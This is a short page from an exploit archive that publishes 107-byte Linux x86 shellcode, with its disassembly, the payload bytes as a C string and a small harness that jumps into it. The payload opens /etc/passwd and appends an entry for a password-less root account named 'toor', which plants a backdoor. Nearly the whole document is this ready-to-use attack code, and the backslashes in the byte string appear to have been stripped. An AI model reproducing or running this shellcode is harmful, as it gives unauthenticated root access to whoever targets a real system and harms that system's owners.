[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : linux/x86 append "/etc/passwd" & exit() 107 bytes
# Published : 2009-12-31
# Author : sandman
# Previous Title : Windows XP Pro Sp2 English "Wordpad" Shellcode
# Next Title : linux/x86 break chroot 79 bytes
/*
append_passwd.c
Payload: Adds the string: [toor::0:0:t00r:/root:/bin/bash] to /etc/passwd thereby adding a password-less root account with login name "toor"
Platform: linux/x86
Size: 107 bytes
Author: $andman
*/
/*
08049054 <_start>:
8049054: eb 38 jmp 804908e <callfunc>
08049056 <func>:
8049056: 5e pop %esi
8049057: 31 c0 xor %eax,%eax
8049059: 88 46 0b mov %al,0xb(%esi)
804905c: 88 46 2b mov %al,0x2b(%esi)
804905f: c6 46 2a 0a movb $0xa,0x2a(%esi)
8049063: 8d 5e 0c lea 0xc(%esi),%ebx
8049066: 89 5e 2c mov %ebx,0x2c(%esi)
8049069: 8d 1e lea (%esi),%ebx
804906b: 66 b9 42 04 mov $0x442,%cx
804906f: 66 ba a4 01 mov $0x1a4,%dx
8049073: b0 05 mov $0x5,%al
8049075: cd 80 int $0x80
8049077: 89 c3 mov %eax,%ebx
8049079: 31 d2 xor %edx,%edx
804907b: 8b 4e 2c mov 0x2c(%esi),%ecx
804907e: b2 1f mov $0x1f,%dl
8049080: b0 04 mov $0x4,%al
8049082: cd 80 int $0x80
8049084: b0 06 mov $0x6,%al
8049086: cd 80 int $0x80
8049088: b0 01 mov $0x1,%al
804908a: 31 db xor %ebx,%ebx
804908c: cd 80 int $0x80
0804908e <callfunc>:
804908e: e8 c3 ff ff ff call 8049056 <func>
8049093: ......string.......
*/
#include <stdio.h>
#include <string.h>
char shell[]= "xebx38x5ex31xc0x88x46x0bx88x46x2bxc6x46x2ax0ax8dx5ex0cx89x5ex2cx8dx1e"
"x66xb9x42x04x66xbaxa4x01xb0x05xcdx80x89xc3x31xd2x8bx4ex2cxb2x1fxb0x04"
"xcdx80xb0x06xcdx80xb0x01x31xdbxcdx80xe8xc3xffxffxffx2fx65x74x63x2fx70"
"x61x73x73x77x64x23x74x6fx6fx72x3ax3ax30x3ax30x3ax74x30x30x72x3ax2fx72"
"x6fx6fx74x3ax2fx62x69x6ex2fx62x61x73x68x20x23";
main(){
printf("[+]shellcode length %dn", strlen(shell));
int *ret;
ret = (int *)&ret + 2;
(*ret) = (int)shell;
}
//HAPPY NEW YEAR!
//#$